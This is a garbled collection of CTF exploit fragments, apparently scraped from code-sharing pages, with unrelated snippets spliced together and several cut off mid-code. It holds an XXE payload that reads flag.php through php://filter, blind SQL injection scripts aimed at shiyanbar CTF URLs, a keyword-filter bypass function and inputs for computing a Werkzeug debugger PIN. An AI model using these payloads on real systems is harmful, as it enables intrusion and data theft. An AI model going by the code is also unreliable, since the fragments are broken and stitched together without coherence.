The goal was to bypass WAF protection to access local resources.
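# Shape check only: four dot-separated digit runs, anchored to the whole string.
# The pattern does not bound an octet to 0-255 and accepts leading zeros, and on
# a Python 3 str pattern `\d` also matches non-ASCII decimal digits unless
# re.ASCII is passed. Whatever consumes the four groups therefore has to do the
# range check itself before the address is trusted for an allow/deny decision.
# Raw string: '\A', '\d', '\.' and '\Z' are invalid escapes in a plain literal
# and raise a warning on current interpreters.
app.re_ip = re.compile(r'\A(\d+)\.(\d+)\.(\d+)\.(\d+)\Z')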
def valid_ip(ip):
matches = app.re_ip.match(ip)| import javax.swing.*; | |
| import java.awt.event.*; | |
| import java.io.*; | |
| import java.net.*; | |
| import java.util.logging.*; | |
| import java.lang.*; | |
| public class ServerMain extends javax.swing.JFrame implements Runnable{ | |
| private JPanel panel1; | |
| private JButton startButton; |
| import hashlib | |
| from itertools import chain | |
| import requests | |
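# Same four inputs, in the same order, as the `probably_public_bits` list that
# Werkzeug hashes when it derives the debugger PIN. Each value is something a
# reader of error pages or local files can learn, which is why the PIN is not a
# security boundary: the interactive debugger has to be off on any reachable host.
# (Table-markup residue removed so the literal parses as Python again.)
probably_public_bits = [
    'ctf',  # username
    'flask.app',  # modname
    'Flask',  # getattr(app, '__name__', getattr(app.__class__, '__name__'))
    '/usr/local/lib/python3.6/site-packages/flask/app.py',  # getattr(mod, '__file__', None)
]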
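// For rows 2..16 of DataGrid1, look up the element whose id is
// "DataGrid1__ctl<N>_JS1" and mark every <option> under it whose value is "优"
// ("excellent") as selected.
var num = [2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16];
for (var i = 0; i < num.length; i++) {
    var field = document.getElementById("DataGrid1__ctl" + num[i] + "_JS1");
    if (!field) {
        // getElementById returns null when the page has fewer rows; skip the
        // row rather than abort the whole loop with a TypeError.
        continue;
    }
    var opts = field.getElementsByTagName("option");
    for (var j = 0; j < opts.length; j++) {
        if (opts[j].value == "优") {
            opts[j].selected = true;
        }
    }
}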
| <?php | |
| /** | |
| * @Created by phpstorm | |
| * @User: tinmin | |
| * @Date: 2019/10/18 | |
| * @Time: 下午5:11 | |
| * @Challenge: Bugku-login4 | |
| */ | |
| $username = "admix"; |
| <?xml version="1.0"?> | |
| <!DOCTYPE netspi [<!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=flag.php" >]> | |
| <root> | |
| <glossary> | |
| <title>example glossary</title> | |
| <GlossDiv> | |
| <title>S</title> | |
| <GlossList> | |
| <GlossEntry> | |
| <ID>SGML</ID> |
| import requests | |
| url = "http://ctf5.shiyanbar.com/web/index_3.php" | |
| def length(sql): | |
| for i in range(50): | |
| payload = "0' or if(length(({}))={},'1',null)='1".format(sql,i) | |
| tmp = { | |
| 'id':payload |
| import requests | |
| import string | |
| url = 'http://ctf5.shiyanbar.com/web/earnest/index.php' | |
| dic = string.ascii_letters + string.digits + '!_{}@~.' | |
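def payload(sql):
    """Return *sql* with spaces and the substring ``or`` rewritten.

    Every space becomes a line feed (0x0a) and, after that, every occurrence
    of ``or`` becomes ``oorr``. The second replacement is a plain substring
    match, so it also fires inside longer words ("information" turns into
    "infoorrmation").

    NOTE(review): the doubled form only makes sense against a filter that
    deletes ``or`` in one non-recursive pass and treats the space character as
    the only separator; presumably that is what the challenge server does.
    Keyword stripping of that kind is not a fix for injection; bound
    parameters are.
    """
    # '\n' is chr(0x0a); the order of the two replacements is kept as written.
    return sql.replace(' ', '\n').replace('or', 'oorr')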
| def foo(): |
| <?php | |
| //__call方法 | |
| namespace app\web\controller; | |
| class Profile{ | |
| } | |
| class Register{} | |
| $a = new Register(); |